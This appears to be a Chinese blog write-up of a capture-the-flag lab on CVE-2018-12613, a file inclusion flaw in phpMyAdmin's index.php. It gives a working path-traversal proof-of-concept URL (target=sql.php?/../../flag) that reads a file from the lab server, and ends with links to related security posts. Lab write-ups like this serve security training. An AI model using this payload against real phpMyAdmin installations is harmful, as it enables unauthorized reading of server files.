春秋云境CVE-2018-12613

1.阅读靶场介绍

index.php中存在一处文件包含逻辑

可以理解为对url做处理

能想到的就是../../../../../flag

2.启动靶场

如上图所示

看到这个界面我想到的就是select flag from flag出来

但是本博主没有找到哟

期待各位大神的评论

3.poc

这里博主是通过这个处理过的url夺旗的

如下所示

url在这里哟

各位可以参考参考哟

复制代码
https://eci-2ze8e04kno5d57s1geyi.cloudeci1.ichunqiu.com:80/?target=sql.php?/../../../../../../../../flag

到此,相信各位都完成夺旗了

感谢您宝贵的时间

相关推荐
李白你好2 小时前
16个漏洞扫描器整合工具
网络安全
一名优秀的码农2 小时前
vulhub系列-60-The Planets: Earth(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
188号安全攻城狮2 小时前
【前端安全】Trusted Types 全维度技术指南:CSP 原生 DOM XSS 防御终极方案
前端·安全·网络安全·xss
一名优秀的码农3 小时前
vulhub系列-56-Matrix-Breakout: 2 Morpheus(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
七夜zippoe3 小时前
应用安全实践(二):Spring Security核心流程与OAuth 2.0授权
java·安全·spring·security·oauth 2.0
陈天伟教授4 小时前
如何选择云端 CI/CD 平台
人工智能·安全·机器学习
m0_738120724 小时前
网络安全编程——如何用Python实现SSH 服务端和SSH 反向 Shell(突破内网)
python·web安全·ssh
SPC的存折4 小时前
12、Ansible安全加固
linux·运维·服务器·安全·ansible
oi..4 小时前
Linux入门(2)
linux·笔记·测试工具·安全·网络安全